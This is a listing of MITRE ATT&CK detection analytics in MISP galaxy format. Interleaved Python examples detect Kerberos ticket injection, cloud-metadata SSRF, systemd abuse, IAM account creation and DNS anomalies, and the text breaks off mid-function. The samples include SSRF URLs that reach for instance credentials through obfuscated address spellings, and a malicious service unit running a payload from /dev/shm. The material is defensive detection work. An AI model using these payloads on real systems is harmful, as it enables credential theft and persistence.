
Analytics

ATT&CK Analytics

Authors
Authors and/or Contributors
MITRE

Analytic 0010 - AN0010

User modification of the $PATH environment variable in shell configuration files or direct runtime PATH changes, followed by execution of binaries from user-controlled directories. Defender observes file edits to ~/.bashrc, ~/.profile, or /etc/paths.d and process execution resolving to unexpected binary locations.

Internal MISP references

UUID 00b5d9a8-a794-4d7c-90df-71c4021e0a46 which can be used as unique global reference for Analytic 0010 - AN0010 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0010
mitre_platforms ['Linux']

Analytic 0100 - AN0100

Suspicious processes initiating encrypted HTTPS connections to common web service domains, followed by abnormal data upload behavior or automated posting behavior indicative of C2 bidirectional traffic.

Internal MISP references

UUID 27bd3e33-9a61-4dfb-9fba-205a6c880264 which can be used as unique global reference for Analytic 0100 - AN0100 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0100
mitre_platforms ['Windows']

Analytic 1000 - AN1000

Detects unauthorized Kerberos ticket injection by correlating service ticket (TGS - 4769) requests with absent corresponding account logons (4624) and prior Ticket Granting Ticket (TGT - 4768) activity. Highlights anomalous service ticket generation chains involving unexpected users, hosts, or times, and suspicious injection of tickets via mimikatz-like tooling into LSASS memory. Behavior also includes network lateral movement using Kerberos authentication absent expected interactive logon patterns.
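The correlation described above, worked through as an added example (not MITRE's code): a 4769 is judged against the 4768 that should precede it for the same client and account, and against the 4624 that should follow on the service host. The events are constructed; the lookback of 10 hours mirrors the default TGT lifetime, and the 5-minute forward window is an assumption to tune.

```python
"""Correlate 4769 (TGS) requests with the 4768 (TGT) and 4624 (logon) events that
should surround them.  The events below are constructed for this example."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    ts: datetime
    event_id: int      # 4768 = TGT request, 4769 = TGS request, 4624 = logon
    host: str          # logging host: a DC for 4768/4769, the target server for 4624
    user: str          # TargetUserName
    client_ip: str     # IpAddress (4624) / Client Address (4768, 4769)
    service: str = ""  # ServiceName on 4769: an SPN or a host account


def norm_ip(ip: str) -> str:
    """DCs log IPv4 clients as IPv4-mapped IPv6 ('::ffff:10.0.0.5'); 4624 does not."""
    return ip[7:] if ip.startswith("::ffff:") else ip


def service_host(service: str) -> str:
    """'cifs/fs01.corp.local' or 'FS01$' -> 'fs01'."""
    name = service.split("/")[-1]
    return name.rstrip("$").split(".")[0].lower()


def find_suspicious_tgs(events, lookback=timedelta(hours=10), forward=timedelta(minutes=5)):
    """Return 4769 events whose expected neighbours are missing.

    lookback: a 4768 for the same client and account must precede the 4769
              (the default TGT lifetime is 10 h, so look back at least that far).
    forward:  the resulting service ticket should produce a 4624 on the target host.
    """
    tgts = [e for e in events if e.event_id == 4768]
    logons = [e for e in events if e.event_id == 4624]
    findings = []
    for e in sorted(events, key=lambda x: x.ts):
        if e.event_id != 4769 or e.user.endswith("$"):
            continue  # machine accounts renew constantly; baseline them separately
        ip, user = norm_ip(e.client_ip), e.user.lower()
        reasons = []
        if not any(t.user.lower() == user and norm_ip(t.client_ip) == ip
                   and e.ts - lookback <= t.ts <= e.ts for t in tgts):
            reasons.append("no prior 4768 for this account from this client")
        target = service_host(e.service)
        if not any(l.user.lower() == user and norm_ip(l.client_ip) == ip
                   and l.host.lower().split(".")[0] == target
                   and e.ts <= l.ts <= e.ts + forward for l in logons):
            reasons.append(f"no 4624 for this account on {target} within {forward}")
        if reasons:
            findings.append({"ts": e.ts, "user": e.user, "client_ip": ip,
                             "service": e.service, "reasons": reasons})
    return findings


def _t(hms):
    return datetime.fromisoformat(f"2024-05-01T{hms}")


# Constructed sample: a healthy chain, an injected ticket, and a harvested ticket.
SAMPLE_EVENTS = [
    Event(_t("10:00:00"), 4768, "DC01", "alice", "::ffff:10.0.0.5"),
    Event(_t("10:00:02"), 4769, "DC01", "alice", "::ffff:10.0.0.5", "cifs/fs01.corp.local"),
    Event(_t("10:00:03"), 4624, "FS01", "alice", "10.0.0.5"),
    # TGS request although no TGT was ever issued to this client: the TGT was injected
    Event(_t("10:30:00"), 4769, "DC01", "svc_backup", "::ffff:10.0.0.77", "cifs/fs01.corp.local"),
    # TGT and TGS obtained but never used for a logon: ticket collected for later use
    Event(_t("10:59:00"), 4768, "DC01", "admin", "10.0.0.9"),
    Event(_t("11:00:00"), 4769, "DC01", "admin", "10.0.0.9", "FS01$"),
]

if __name__ == "__main__":
    for f in find_suspicious_tgs(SAMPLE_EVENTS):
        print(f["ts"], f["user"], f["client_ip"], f["service"], "->", "; ".join(f["reasons"]))
```

Because 4768 is only written by the DC that issued the TGT, the input must be the merged log of every DC; a single-DC feed produces "no prior 4768" findings for every client that happened to talk to another DC.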

Internal MISP references

UUID 54ffc701-eb6c-4e3e-8615-0c6f8b327a34 which can be used as unique global reference for Analytic 1000 - AN1000 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1000
mitre_platforms ['Windows']

Analytic 0001 - AN0001

Detects access attempts to cloud instance metadata endpoints (e.g., 169.254.169.254) from virtual machines or containerized workloads. This includes both direct access and SSRF exploitation patterns.
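As an added example of the SSRF half of this analytic (not part of the MITRE page), the check below normalises the alternative spellings of the metadata address that SSRF payloads use to slip past naive string matching (decimal, hex, dotted-octal, IPv4-mapped IPv6, the AWS IPv6 endpoint, the GCE DNS alias) and scans the query parameters of constructed web-server access log lines for any value that resolves to it.

```python
"""Flag requests whose parameters point at a cloud instance metadata service,
including the encodings an SSRF payload uses to hide the address.  Log lines are constructed."""
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

IMDS_ADDRESSES = {ipaddress.ip_address("169.254.169.254"),  # AWS, Azure, GCP, OpenStack (IPv4)
                  ipaddress.ip_address("fd00:ec2::254")}    # AWS IMDS IPv6 endpoint
IMDS_HOSTNAMES = {"metadata.google.internal"}                # GCE DNS alias for the same service
_REQ = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')


def _octet(part: str) -> int:
    if part.startswith(("0x", "0X")):
        return int(part, 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)   # dotted-octal, e.g. 0251.0376.0251.0376
    return int(part)


def host_to_ip(host: str):
    """Normalise decimal (2852039166), hex (0xa9fea9fe), octal and IPv4-mapped IPv6
    spellings to an ip_address; return None for a name that is not an address."""
    h = host.strip("[]").lower()
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        try:
            if h.startswith("0x"):
                ip = ipaddress.ip_address(int(h, 16))
            elif h.isdigit():
                ip = ipaddress.ip_address(int(h))
            elif h.count(".") == 3:
                ip = ipaddress.ip_address(".".join(str(_octet(p)) for p in h.split(".")))
            else:
                return None
        except ValueError:
            return None
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return ip


def targets_imds(url: str) -> bool:
    """True when a URL or bare host taken from a request parameter points at IMDS."""
    u = urlsplit(url if "//" in url else "//" + url)
    host = (u.hostname or "").lower()
    if host in IMDS_HOSTNAMES:
        return True
    ip = host_to_ip(host)
    return ip is not None and ip in IMDS_ADDRESSES


def scan_access_log(lines):
    """Inspect every query-string value of each request; return (client, param, value) hits."""
    hits = []
    for line in lines:
        m = _REQ.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for param, values in parse_qs(urlsplit(m.group(1)).query).items():
            for v in values:
                v = unquote(v)
                if targets_imds(v):
                    hits.append((client, param, v))
    return hits


# Constructed access log of a web application with a URL-fetching endpoint.
SAMPLE_LOG = [
    '10.1.2.3 - - [01/May/2024:13:55:36 +0000] "GET /fetch?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F HTTP/1.1" 200 512',
    '10.1.2.3 - - [01/May/2024:13:55:40 +0000] "GET /fetch?url=http://2852039166/latest/meta-data/ HTTP/1.1" 200 100',
    '10.1.2.3 - - [01/May/2024:13:55:44 +0000] "GET /fetch?url=http://0xa9fea9fe/latest/meta-data/ HTTP/1.1" 200 100',
    '10.1.2.3 - - [01/May/2024:13:55:48 +0000] "GET /fetch?url=http://[fd00:ec2::254]/latest/meta-data/ HTTP/1.1" 200 100',
    '10.1.2.3 - - [01/May/2024:13:55:52 +0000] "GET /fetch?url=http://metadata.google.internal/computeMetadata/v1/ HTTP/1.1" 200 100',
    '10.1.2.9 - - [01/May/2024:13:56:01 +0000] "GET /fetch?url=https://example.com/ HTTP/1.1" 200 100',
    '10.1.2.9 - - [01/May/2024:13:56:05 +0000] "GET /healthz HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(*hit)
```

The direct-access half is covered on the instance itself: an egress record (auditd, eBPF, flow logs with process attribution) from anything other than the cloud agents to these addresses. Requiring IMDSv2 on AWS (HttpTokens=required, hop limit 1) also turns the plain GET in the first log line into a failed request, which is still worth alerting on.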

Internal MISP references

UUID f4af0b1b-db51-4266-8b02-2cdfcb191f60 which can be used as unique global reference for Analytic 0001 - AN0001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0001
mitre_platforms ['IaaS']

Analytic 2000 - AN2000

Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).

Internal MISP references

UUID 56622fce-489a-4ed9-b1fb-e525939667d4 which can be used as unique global reference for Analytic 2000 - AN2000 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2000
mitre_platforms ['PRE']

Analytic 0200 - AN0200

Abuse of systemctl to execute commands or manage systemd services. Defender perspective: correlate suspicious service creation or modification with execution of systemctl subcommands such as start, enable, or status. Detect cases where systemctl is used to load services from unusual locations (e.g., /tmp, /dev/shm) or where new service units are created outside of expected administrative workflows.
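An added example (not the page's own code) of the three checks this analytic asks for: a systemctl invocation that activates a unit by absolute path from a scratch directory, a unit file whose Exec* lines reach into such a directory, and the chain "unit file written by something other than a package manager, then activated". The process and file events are constructed; the directory and package-manager lists are assumptions to adapt.

```python
"""Spot systemctl and unit-file activity that loads code from scratch directories.
Events and the unit text are constructed for this example."""
import shlex
from datetime import datetime, timedelta

UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/", "/run/user/")
UNIT_DIRS = ("/etc/systemd/system/", "/usr/lib/systemd/system/", "/lib/systemd/system/",
             "/run/systemd/system/")
PACKAGE_MANAGERS = {"dpkg", "rpm", "apt", "apt-get", "yum", "dnf", "zypper", "pacman"}
ACTIVATING = {"start", "restart", "enable", "reenable", "link", "reload-or-restart"}


def untrusted_paths(tokens):
    return [t for t in tokens if t.startswith(UNTRUSTED_PREFIXES)]


def suspicious_systemctl(cmdline: str):
    """Reason string when systemctl activates a unit given as a path outside the
    unit directories (enable and link accept absolute unit paths)."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "systemctl":
        return None
    args = [a for a in argv[1:] if not a.startswith("-")]
    if not args or args[0] not in ACTIVATING:
        return None
    bad = untrusted_paths(args[1:])
    return f"systemctl {args[0]} references unit outside unit dirs: {bad}" if bad else None


def suspicious_unit(unit_text: str):
    """(key, path) for every token of an Exec* directive under an untrusted prefix,
    so '/bin/sh -c /dev/shm/.x/run' is caught as well as a direct path."""
    bad = []
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line.startswith("Exec") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        # systemd permits prefix characters (- @ : + ! !!) before the executable
        tokens = shlex.split(value.lstrip("-@:+!"))
        bad += [(key, t) for t in untrusted_paths(tokens)]
    return bad


def scan_processes(events):
    out = []
    for e in events:
        if e["kind"] == "process":
            reason = suspicious_systemctl(e["cmdline"])
            if reason:
                out.append((e["cmdline"], e["user"], reason))
    return out


def correlate(events, window=timedelta(minutes=10)):
    """Unit file written by a non-package-manager process, then activated by name."""
    findings = []
    writes = [e for e in events if e["kind"] == "file_write" and e["path"].startswith(UNIT_DIRS)
              and e["writer"] not in PACKAGE_MANAGERS and e["writer_parent"] not in PACKAGE_MANAGERS]
    for w in writes:
        unit = w["path"].rsplit("/", 1)[-1]
        reasons = [f"{unit} written by {w['writer']} (parent {w['writer_parent']})"]
        reasons += [f"{k} uses {p}" for k, p in suspicious_unit(w["content"])]
        for p in events:
            if p["kind"] != "process" or not (w["ts"] <= p["ts"] <= w["ts"] + window):
                continue
            argv = shlex.split(p["cmdline"])
            if argv and argv[0].endswith("systemctl") and any(
                    a in (unit, unit.rsplit(".", 1)[0]) for a in argv[1:]):
                reasons.append(f"activated by '{p['cmdline']}' as {p['user']}")
        if len(reasons) > 1:  # report only when the write is suspicious or acted upon
            findings.append({"unit": unit, "reasons": reasons})
    return findings


def _t(hms):
    return datetime.fromisoformat(f"2024-05-01T{hms}")


EVIL_UNIT = """[Unit]
Description=System Update Service
After=network.target

[Service]
ExecStart=/bin/sh -c "/dev/shm/.x/update --daemon"
Restart=always

[Install]
WantedBy=multi-user.target
"""

SAMPLE_EVENTS = [
    {"ts": _t("09:00:00"), "kind": "file_write", "path": "/etc/systemd/system/sysupdate.service",
     "writer": "bash", "writer_parent": "sshd", "content": EVIL_UNIT},
    {"ts": _t("09:00:05"), "kind": "process", "cmdline": "systemctl daemon-reload", "user": "root"},
    {"ts": _t("09:00:06"), "kind": "process", "cmdline": "systemctl enable --now sysupdate.service", "user": "root"},
    # benign: a package manager installing a unit whose ExecStart lives under /usr
    {"ts": _t("09:30:00"), "kind": "file_write", "path": "/usr/lib/systemd/system/nginx.service",
     "writer": "dpkg", "writer_parent": "apt-get", "content": "[Service]\nExecStart=/usr/sbin/nginx -g 'daemon on;'\n"},
    {"ts": _t("09:30:02"), "kind": "process", "cmdline": "systemctl restart nginx.service", "user": "root"},
    # activation of a unit that never went through a unit directory at all
    {"ts": _t("10:00:00"), "kind": "process", "cmdline": "/usr/bin/systemctl link /tmp/.cache/worker.service", "user": "www-data"},
]

if __name__ == "__main__":
    print(scan_processes(SAMPLE_EVENTS))
    print(correlate(SAMPLE_EVENTS))
```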

Internal MISP references

UUID 756d5795-ef61-4115-80d2-f2e7440dff56 which can be used as unique global reference for Analytic 0200 - AN0200 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0200
mitre_platforms ['Linux']

Analytic 0002 - AN0002

Detects non-standard processes (e.g., PowerShell, python.exe, rundll32.exe) making outbound connections using publish/subscribe protocols (e.g., MQTT, AMQP) over non-browser, encrypted channels, often beaconing to message brokers.

Internal MISP references

UUID ee4e3e61-e138-498b-93bf-3a5f8fea691c which can be used as unique global reference for Analytic 0002 - AN0002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0002
mitre_platforms ['Windows']

Analytic 0020 - AN0020

Remote access to third-party SaaS with OAuth or API tokens after initial compromise, followed by sensitive data access or configuration changes.

Internal MISP references

UUID fb23f9ee-cdc8-46be-8f40-3631afbaff5a which can be used as unique global reference for Analytic 0020 - AN0020 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0020
mitre_platforms ['SaaS']

Analytic 0030 - AN0030

Processes generating large outbound connections with disproportionate send/receive ratios, often to uncommon ports or hosts, potentially inserting meaningless data into protocol payloads.

Internal MISP references

UUID 3e852bb9-785d-4bc4-9f7e-b7e43a5d8bc8 which can be used as unique global reference for Analytic 0030 - AN0030 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0030
mitre_platforms ['Windows']

Analytic 0003 - AN0003

Detects CLI tools (e.g., mosquitto_pub, nc, python scripts) interacting with pub/sub brokers using unusual topic names, high-frequency publication rates, or obfuscated payloads to non-standard hosts.

Internal MISP references

UUID 3ecc4ba2-bf4f-481c-b813-69c169c28c83 which can be used as unique global reference for Analytic 0003 - AN0003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0003
mitre_platforms ['Linux']

Analytic 0300 - AN0300

Correlation of Mail.app logs with Safari/Chrome activity. Suspicious behavior includes email links → Safari/Chrome accessing newly registered or lookalike domains → osascript or Terminal spawned unexpectedly.

Internal MISP references

UUID b18b93d1-3f63-4788-8e26-68db032995e0 which can be used as unique global reference for Analytic 0300 - AN0300 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0300
mitre_platforms ['macOS']

Analytic 0004 - AN0004

Detects osascript, curl, or custom binaries interacting with XMPP/MQTT brokers in unapproved destinations with encrypted payloads or frequent POST-like requests to broker URIs.

Internal MISP references

UUID 131d3f89-e10d-4ac9-a9d0-fcb4e8e8760a which can be used as unique global reference for Analytic 0004 - AN0004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0004
mitre_platforms ['macOS']

Analytic 0400 - AN0400

Processes that typically do not perform cryptographic operations loading symmetric encryption libraries (e.g., bcryptprimitives.dll, aes.dll), then initiating outbound connections with high-entropy payloads. Defender correlates process creation, DLL load, and anomalous encrypted traffic patterns.

Internal MISP references

UUID 704bd588-a82b-4139-92ef-6dc6a48581c8 which can be used as unique global reference for Analytic 0400 - AN0400 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0400
mitre_platforms ['Windows']

Analytic 0040 - AN0040

Detects staging of sensitive files into temporary or public directories, compression with 7zip/WinRAR, or batch copy prior to exfiltration.

Internal MISP references

UUID 7cb2010a-e502-4117-94f3-fa3bd8d64a34 which can be used as unique global reference for Analytic 0040 - AN0040 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0040
mitre_platforms ['Windows']

Analytic 0500 - AN0500

Correlated evidence where Safari/Chrome/WebKit-based processes issue network requests for uncommon or obfuscated JS resources followed by spawning of script interpreters, launchd or ad-hoc binaries, unusual child processes, or dynamic library loads into browser processes. Defender sees: proxy/HTTP logs with suspicious resource content + unifiedlogs/ASL showing browser/plugin crashes or extension loads + process events indicating child process creation and file writes to /var/folders or /tmp shortly after the fetch.

Internal MISP references

UUID 230a55ce-4584-4588-a006-5532a9efdbd8 which can be used as unique global reference for Analytic 0500 - AN0500 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0500
mitre_platforms ['macOS']

Analytic 0005 - AN0005

Detects pub/sub traffic over unusual ports, high-frequency topic publications, and connections to known-bad or dynamic broker endpoints outside allowlisted infrastructure.

Internal MISP references

UUID 748f457a-5dfa-431b-b5a0-3d5e1d56ebbb which can be used as unique global reference for Analytic 0005 - AN0005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0005
mitre_platforms ['Network Devices']

Analytic 0050 - AN0050

Adversary attempts to detect monitoring agents such as Little Snitch, KnockKnock, or other system daemons via process listing (ps -e), application folder checks, and system extension listing.

Internal MISP references

UUID 9d76d84b-6393-45cf-b872-eb5921508ee3 which can be used as unique global reference for Analytic 0050 - AN0050 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0050
mitre_platforms ['macOS']

Analytic 0060 - AN0060

Correlates zsh shell configuration file changes (e.g., ~/.zshrc, ~/.zlogin, /etc/zprofile) with execution of unauthorized binaries or unexpected network activity triggered on Terminal.app launch.

Internal MISP references

UUID 6acf01f9-723e-499b-8774-3fa689a36ded which can be used as unique global reference for Analytic 0060 - AN0060 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0060
mitre_platforms ['macOS']

Analytic 0006 - AN0006

Adversary uses built-in tools such as 'net user /add /domain' or PowerShell to create a domain user account. The behavior chain includes: (1) suspicious process execution on a domain controller followed by (2) user account creation event (Event ID 4720) on the same host.

Internal MISP references

UUID 86103b48-cd6d-447d-aef4-807e10355506 which can be used as unique global reference for Analytic 0006 - AN0006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0006
mitre_platforms ['Windows']

Analytic 0600 - AN0600

Detection of shell scripts, ELF binaries, or archives containing embedded secondary payloads, self-extracting components, or unusual compression behavior during runtime.

Internal MISP references

UUID db9b55b0-7e54-4625-92d5-fbe9ed8ac868 which can be used as unique global reference for Analytic 0600 - AN0600 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0600
mitre_platforms ['Linux']

Analytic 0070 - AN0070

Detects abnormal interaction with memory-based Kerberos ccache (API:{uuid}) or file-based overrides. Focus on processes attempting to enumerate or extract Kerberos tickets outside of built-in utilities. Detects use of open-source tools (e.g., Bifrost, modified Mimikatz ports) that interact with the Kerberos framework APIs.

Internal MISP references

UUID 2a9d296d-6b36-42de-870c-9d851c0471ed which can be used as unique global reference for Analytic 0070 - AN0070 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0070
mitre_platforms ['macOS']

Analytic 0700 - AN0700

Execution of Homebrew, pip3, npm, or manually downloaded PKGs from Terminal or shell, followed by the creation of startup agents, interpreter spawns, or outbound connections to unfamiliar domains. Defender links Terminal commands to plist creation, unsigned binary launches, and python3 or node processes connecting to remote endpoints.

Internal MISP references

UUID 98f18ad5-0def-4ac3-8822-7538f0a8d64d which can be used as unique global reference for Analytic 0700 - AN0700 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0700
mitre_platforms ['macOS']

Analytic 0007 - AN0007

Adversary with access to domain management tools (e.g., realmd, samba-tool, ldapmodify) creates a new domain user via command-line utilities. Behavior chain: LDAP command or script triggers → user entry added in AD via Kerberos/LDAP traffic.

Internal MISP references

UUID e86081ab-aad1-48a1-abd8-5a5c8c7c936a which can be used as unique global reference for Analytic 0007 - AN0007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0007
mitre_platforms ['Linux']

Analytic 0008 - AN0008

macOS clients joined to AD via LDAP may script account provisioning via dsconfigad, dscl, or LDAP scripts. Detection occurs when such tools run on a domain-joined system, followed by authentication attempts by a previously unseen account.

Internal MISP references

UUID 03513eb2-6dbd-4160-94dd-25d2bce349be which can be used as unique global reference for Analytic 0008 - AN0008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0008
mitre_platforms ['macOS']

Analytic 0800 - AN0800

Correlates suspicious removal or modification of the com.apple.quarantine extended attribute, manipulation of LSFileQuarantineEnabled values in Info.plist, and unexpected process execution of unsigned or non-notarized binaries. Also monitors abnormal trust validation failures in unified logs and unusual activity in QuarantineEvents database entries.

Internal MISP references

UUID b6516e8b-fd18-4c92-8701-1762d8321168 which can be used as unique global reference for Analytic 0800 - AN0800 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0800
mitre_platforms ['macOS']

Analytic 0080 - AN0080

Processes invoking network-intensive child processes or uploading large data volumes, often from non-standard user or system contexts, with evidence of long-duration TCP/UDP sessions to unusual destinations.

Internal MISP references

UUID c699a4ee-83dd-48d8-94ae-658204066ae9 which can be used as unique global reference for Analytic 0080 - AN0080 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0080
mitre_platforms ['Windows']

Analytic 0090 - AN0090

Binaries or applications executed with tampered or unverifiable code signatures. Often tied to Gatekeeper bypasses, App Translocation, or use of unsigned launch daemons by untrusted users.

Internal MISP references

UUID 35d9b6e6-aed8-4e9e-b6ee-e683d9c17fd0 which can be used as unique global reference for Analytic 0090 - AN0090 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0090
mitre_platforms ['macOS']

Analytic 0900 - AN0900

Adversaries use cloud API, CLI, or console to create IAM users or roles. Initial CreateUser is followed by policy/role attachment. Detection monitors temporal chains involving IAM:CreateUser, AttachUserPolicy, and credential generation, especially from automation or foreign IP ranges.
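The temporal chain described here, as an added example over constructed CloudTrail-shaped events (not MITRE's code): each successful CreateUser is followed forward in time for privilege attachment and credential issuance for the same userName, and the source of the CreateUser is scored against corporate egress ranges and known provisioning identities, both of which are assumptions for the example.

```python
"""Chain CloudTrail IAM events into CreateUser -> privilege -> credential sequences.
The events below are constructed to look like CloudTrail records; they are not real."""
import ipaddress
from datetime import datetime, timedelta

PRIVILEGE_EVENTS = {"AttachUserPolicy", "PutUserPolicy", "AddUserToGroup"}
CREDENTIAL_EVENTS = {"CreateAccessKey", "CreateLoginProfile"}
# Assumptions for this example: the organisation's egress ranges and the identities
# expected to provision users (an IdP/SCIM role, an IaC pipeline role).
CORPORATE_RANGES = [ipaddress.ip_network("203.0.113.0/24")]
PROVISIONING_ARNS = {"arn:aws:sts::123456789012:assumed-role/ScimProvisioner/scim"}


def _ts(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _target_user(ev):
    return (ev.get("requestParameters") or {}).get("userName")


def find_user_creation_chains(events, window=timedelta(hours=1)):
    """One chain per successful CreateUser, with the follow-on steps inside `window`."""
    events = sorted(events, key=_ts)
    chains = []
    for i, ev in enumerate(events):
        if ev["eventName"] != "CreateUser" or ev.get("errorCode"):
            continue
        user, actor = _target_user(ev), ev["userIdentity"]["arn"]
        steps = ["CreateUser"]
        for later in events[i + 1:]:
            if _ts(later) - _ts(ev) > window:
                break
            if _target_user(later) == user and later["eventName"] in PRIVILEGE_EVENTS | CREDENTIAL_EVENTS:
                steps.append(later["eventName"])
        flags = []
        try:  # sourceIPAddress may also be a service name such as 'cloudformation.amazonaws.com'
            src = ipaddress.ip_address(ev["sourceIPAddress"])
        except ValueError:
            src = None
        if src is None or not any(src in net for net in CORPORATE_RANGES):
            flags.append("source outside corporate ranges")
        if ev.get("userAgent", "").startswith(("aws-cli/", "Boto3/", "aws-sdk-")) and actor not in PROVISIONING_ARNS:
            flags.append("programmatic client from a non-provisioning identity")
        if set(steps) & PRIVILEGE_EVENTS:
            flags.append("privileges granted to the new user")
        if set(steps) & CREDENTIAL_EVENTS:
            flags.append("credentials issued for the new user")
        severity = "high" if len(flags) >= 3 else "medium" if len(flags) == 2 else "low"
        chains.append({"user": user, "actor": actor, "source": ev["sourceIPAddress"],
                       "steps": steps, "flags": flags, "severity": severity})
    return chains


def _ev(t, name, arn, ip, ua, user, error=None):
    return {"eventTime": f"2024-05-01T{t}Z", "eventSource": "iam.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": arn}, "sourceIPAddress": ip, "userAgent": ua,
            "requestParameters": {"userName": user}, **({"errorCode": error} if error else {})}


ATTACKER = "arn:aws:iam::123456789012:user/ci-deploy"            # a compromised long-lived key
ADMIN = "arn:aws:sts::123456789012:assumed-role/Admin/jane"       # human admin in the console
CLI = "aws-cli/2.15.0 Python/3.11.6 Linux/6.1 exe/x86_64"

SAMPLE_EVENTS = [
    _ev("08:00:00", "CreateUser", ATTACKER, "198.51.100.23", CLI, "backup-svc"),
    _ev("08:00:04", "AttachUserPolicy", ATTACKER, "198.51.100.23", CLI, "backup-svc"),
    _ev("08:00:09", "CreateAccessKey", ATTACKER, "198.51.100.23", CLI, "backup-svc"),
    _ev("09:15:00", "CreateUser", ADMIN, "203.0.113.10", "console.amazonaws.com", "new-hire"),
    _ev("09:15:30", "AddUserToGroup", ADMIN, "203.0.113.10", "console.amazonaws.com", "new-hire"),
    _ev("11:00:00", "CreateUser", ATTACKER, "198.51.100.23", CLI, "backup-svc", error="EntityAlreadyExists"),
]

if __name__ == "__main__":
    for c in find_user_creation_chains(SAMPLE_EVENTS):
        print(c["severity"], c["user"], c["steps"], c["flags"])
```

The role variant of the same behaviour (CreateRole, then AttachRolePolicy or UpdateAssumeRolePolicy pointing the trust policy at a foreign account) fits the same loop with requestParameters.roleName as the join key.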

Internal MISP references

UUID 4264c6fb-20b2-4792-8939-c7d8f204338a which can be used as unique global reference for Analytic 0900 - AN0900 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0900
mitre_platforms ['IaaS']

Analytic 0009 - AN0009

Abnormal modification of the PATH environment variable or registry keys controlling system paths, combined with execution of binaries named after legitimate system tools from user-writable directories. Defender correlates registry modifications, file creation of suspicious binaries, and process execution paths inconsistent with baseline system directories.

Internal MISP references

UUID bbd003ec-4208-48bb-9ad5-b9dd627fdd14 which can be used as unique global reference for Analytic 0009 - AN0009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0009
mitre_platforms ['Windows']

Analytic 0110 - AN0110

Monitor /var/log/audit/audit.log and DNS resolver logs for repeated failed lookups or connections to high-entropy domain names. Correlate suspicious DNS queries with process lineage (e.g., Python, bash, or unusual system daemons).
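An added example (not MITRE's code) of the two halves of this analytic: a Shannon-entropy score on the query name, and a per-process count of failed lookups for high-entropy names tied to the process lineage. The DNS records are constructed, and the random-looking names are generated with a seeded RNG so the run is reproducible; thresholds are assumptions.

```python
"""Score DNS query names by label entropy and tie bursts of failed lookups back to
the process lineage that issued them.  Records are constructed for this example."""
import math
import random
from collections import Counter, defaultdict
from datetime import datetime, timedelta

COMMON_SUFFIXES = {"co.uk", "com.au", "co.jp"}   # tiny illustrative public-suffix set


def shannon_entropy(s: str) -> float:
    """Bits per character; 'abcd' -> 2.0, 'aaaa' -> 0.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def is_high_entropy(qname: str, min_len=10, min_bits=3.5) -> bool:
    """True when any label below the public suffix is long and close to random."""
    labels = qname.lower().rstrip(".").split(".")
    suffix_len = 2 if ".".join(labels[-2:]) in COMMON_SUFFIXES else 1
    return any(len(l) >= min_len and shannon_entropy(l) >= min_bits for l in labels[:-suffix_len])


def burst_failures(records, min_failures=5, window=timedelta(minutes=10)):
    """Processes with at least `min_failures` NXDOMAIN answers for high-entropy names
    inside `window`.  Counting failures, not just entropy, keeps CDN hostnames
    (random-looking but resolvable) out of the results."""
    by_proc = defaultdict(list)
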